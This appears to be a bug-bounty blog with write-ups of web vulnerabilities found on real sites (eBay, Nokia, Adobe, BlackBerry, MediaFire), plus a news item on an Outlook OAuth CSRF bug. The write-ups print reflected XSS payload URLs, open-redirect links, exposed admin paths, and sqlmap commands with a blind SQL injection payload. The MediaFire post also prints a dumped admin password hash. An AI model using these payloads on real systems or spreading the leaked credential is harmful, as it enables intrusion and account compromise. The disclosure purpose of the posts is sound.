Thursday, October 8, 2015

Microsoft Pays $24,000 To Researcher For Preventing Dangerous Outlook Worm

Email is, perhaps, the most hopelessly insecure of all web apps. For individuals and businesses it can be a nightmare attempting to keep hackers out of inboxes. This summer, Wesley Wineberg, a security researcher at Synack, found that to be all too true, discovering a bug affecting all services running over Microsoft’s Live.com, allowing malicious hackers to gain access to a user’s entire Outlook account.
Admittedly, there was plenty of trickery involved. Wineberg first analysed the way in which Outlook allowed other apps to access it, using a standard set of authentication code known asOAuth. He discovered he could create an “evil app” containing an OAuth bypass, only needing to trick a user to visiting a website and they would effectively grant that naughty software access to everything in their account.
But for most hackers, this kind of vulnerability, known as across-site request forgery (CSRF), is all too common across the web. Typically, these attacks end as soon as the legitimate user logs out, but in the case of Outlook anyone abusing Wineberg’s vulnerability would have permanent access to the account, Wineberg said.
Most concerning of all, it could have been abused to create a nasty email worm, he added. “The real danger of this vulnerability is that it would be very easy to turn into the classic email worm of decades past. After the first victim is compromised, this vulnerability could be used to email every one of their contacts with a link that would then compromise those users’ accounts as well,” Wineberg noted, providing the below footage of his attack to FORBES.

ms-oauth-demo2

“This really is just a classic CSRF vulnerability. The only thing that’s surprising about it is that it’s in a critical authentication system which ultimately can be used to take over any user’s account,” he added in a Synack blog post.

Friday, August 30, 2013

Multiple Adobe Bugs by Me

Open Redirector:  https://tv.adobe.com/session/?redirect=http://google.com

if a user is logged in adobe..and clicks the link, he'll be automatically redirected to google.com thus an attacker can put an encoded malicious link to harm users of adobe.


Directory Listing:

http://groups.adobe.com/CFIDE/
http://groups.adobe.com/CFIDE/adminapi/
http://groups.adobe.com/CFIDE/administrator/images/
http://groups.adobe.com/CFIDE/scripts
http://groups.adobe.com/CFIDE/images/
http://groups.adobe.com/CFIDE/debug
http://groups.adobe.com/CFIDE/portlets/

and so on....


Open FCKEeditors-

http://groups.adobe.com/CFIDE/scripts/ajax/FCKeditor/editor./filemanager/browser/default/browser.html


http://groups.adobe.com/CFIDE/scripts/ajax/FCKeditor/editor/fckeditor.original.html



Open FIle uploads-

http://groups.adobe.com/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/browser/default/frmupload.html



Persistent XSS in Ebay - One of the best '12 discoveries

I found this bug, last year and this was my first bug and the most precious one.

In order to exploit the vulnerability, attacked would need a seller account.Once login to seller account on eBay, the attacker would create a listing for sale where he put the XSS exploit code.




Here was the page where I injected the code: http://www.ebay.com/itm/181023275832?ssPageName=STRK:MESELX:IT&_trksid=p3984.m1555.l2649 

The mirror is available here: http://www.xssed.com/mirror/79254/ 

In news for this great discover: https://www.google.co.in/search?q=ebay+persistent+xss&oq=ebay+persistent+xss&aqs=chrome.0.69i57j69i62.3702j0&sourceid=chrome&ie=UTF-8

Tuesday, June 4, 2013

XSS in Ebay Labs

I got 2 non persistent XSS bugs in ebay labs website. Below are the details,

URL: http://labs.ebay.com

Alert Box:

1st one- http://labs.ebay.com/erl/demoto/to- add=lp&origtitle=Mr.&qy=%27%20onmouseover%3dprompt %281337%29%20bad%3d%27&skipk=20&sq=pop&title=Mr.

2nd one- http://labs.ebay.com/publications/-wpa-paged=2&wpa- sort=%22%20onmouseover%3dprompt%281337%29%20bad%3d%22




Attack Details:URL encoded GET input qy was set to ' onmouseover=prompt(1337) bad='

The input is reflected inside a tag parameter between single quotes.

Affected items: /erl/demoto/to & /publications/

The impact of this vulnerability: Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user. It is also possible to modify the content of the page presented to the user.

How to fix this vulnerability: Your script should filter metacharacters from user input.

This bug is reported to ebay and resolved now.




BlackBerry Multiple Bugs

images (259×195)

I had found 3 bugs in blackberry mobile site, m.blackberry.com & 2 bugs in developers site developer.blackberry.com.

Tested ON- OS: Windows 7 Browser: Google Chrome & Firefox (latest versions)

1. URL redirection is sometimes used as a part of phishing attacks that confuse visitors about which web site they are visiting & or they are made to download malicious files.

A remote attacker can redirect users from your website to a specified URL. This problem may assist an attacker to conduct phishing attacks, trojan distribution, spammers.


=> Vulerable URL: http://m.blackberry.com/cps/rde/xchg/blackberrymobile2012/hs.xsl/-/index.html?
formregion=//www.apple.com&RememberRegion=yes&submit=GO

The above URL redirects to apple.com , which can be replaced with a malicious phishing URL or file containing Malware.

Fix: Your script should properly sanitize user input


2. Path disclosure Type: Information Disclosure URL: http://m.blackberry.com/cps/rde/xchg/blackberrymobile2012


The above URL is disclosing the path on the server: /cps/rde/xchg/SID-B461826F-730AD1C9/blackberrymobile2012


Fix: Deal with errors gracefully when a file is not located in the location is should be.


3.Important HTML forms without CSRF Protection- /at/de/feedback.html /at/de/polling1.html


I reported this to BlackBerry PSIRT already & the bugs are patched by now.

The 2 bugs in the developers site were use of SSL 2.0 deprecated protocol & SSL weak ciphers, which are not very critical.




Non persistant XSS in Nokia Subdomain

I had found 2 Non persistant XSS bugs in one Nokia subdomain, please look for the details below..



Subdomain: https://www.sales.nokia.com

Vulnerability type:  XSS

Affected Items:

/mis/forgotPwdSubmit.do
/mis/loginSubmit.do

Vulnerable URLs:

1. https://www.sales.nokia.com/mis/loginSubmit.do?CALLING_PAGE=&txtPasswd=&txtUsrName="</script>'<SCRIPT>alert("XSS")</SCRIPT>


2. https://www.sales.nokia.com/mis/forgotPwdSubmit.do?txtEmailID=&txtUserID=%22%3C/script%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C/SCRIPT%3E

Though it was not that easy you to find this XSS as it was a login page that was using POST requests to authenticate and there was a javascript blocking use of any special characters, So I used the firefox addon to tamper the request like putting admin@nokia.com in email and password 12345, then tampering the admin@nokia with a normal payload, still it didn't execute then I checked the source of the page, and noticed there is " and <script> tag open, so I modified the payload and it successfully executed.



Tested On- Windows 7 and Firefox Latest Version

I reported it to nokia then finally.



-Cyb3R_Shubh4M

Mediafire Blind SQL Injection



I had found a critical Blind SQLi bug in mediafire knowledgebase. Which could be used to break into mediafire servers. please look below for details..


#Software Tybe: PHPKB Knowledge Base Software v7

#Tool Used: sqlmap on ubuntu

#Tested on: Ubuntu & Windows (Chrome & firefox)

#Commands used in SQL Map:


1>>   ./sqlmap.py -u http://knowledgebase.mediafire.com/article.php?id=72 -dbs

2>>   ./sqlmap.py -u http://knowledgebase.mediafire.com/article.php?id=72 -D knowledgebase --tables





Tybe: PHPKB Knowledge Base Software

---------------------
Blind SQL Injection
---------------------

http://knowledgebase.mediafire.com/article.php?id=72

Target:
http://knowledgebase.mediafire.com/article.php?id=%Inject_Here%72

---

Place: GET
Parameter: id

Type: AND/OR time-based blind
Title: Mysql > 5.0.11 AND time-based blind
Payload: id=72 AND SLEEP(5)

---

available databases [3]:

[*] information_schema
[*] knowledgebase
[*] test

Database: knowledgebase
[27 tables]
+-------------------------------+
| phpkb_article_collaboration
| phpkb_article_versions      
| phpkb_article_visits        
| phpkb_articles              
| phpkb_attachments          
| phpkb_authors              
| phpkb_autosave              
| phpkb_categories            
| phpkb_comments              
| phpkb_custom_data          
| phpkb_custom_fields        
| phpkb_favorites            
| phpkb_glossary              
| phpkb_groups                
| phpkb_groups_categories    
| phpkb_groups_relations      
| phpkb_languages            
| phpkb_login_attempts        
| phpkb_news                  
| phpkb_ratings              
| phpkb_referrers            
| phpkb_relations            
| phpkb_saved_searches        
| phpkb_subscribers          
| phpkb_templates            
| phpkb_tickets              
| phpkb_translation_assignments
+-------------------------------+

While digging their tables I found the admin details in the table _authors, it was getting a bit harder as sqlmap was not able to extract the column names completely. So, I made a guess and it was author_username & author_password. So I found the below details-

admin:3793afe7fdea09c7f8055834cc252234

While testing the algorithm of the hash I found that it was md5 or domain cached credentials.
But I couldn't crack it, it was taking a hell lot of time.

So this was all, when I reported it to mediafire's VP they said its duplicate. And hence I made it public.





-Cyb3R_Shubh4M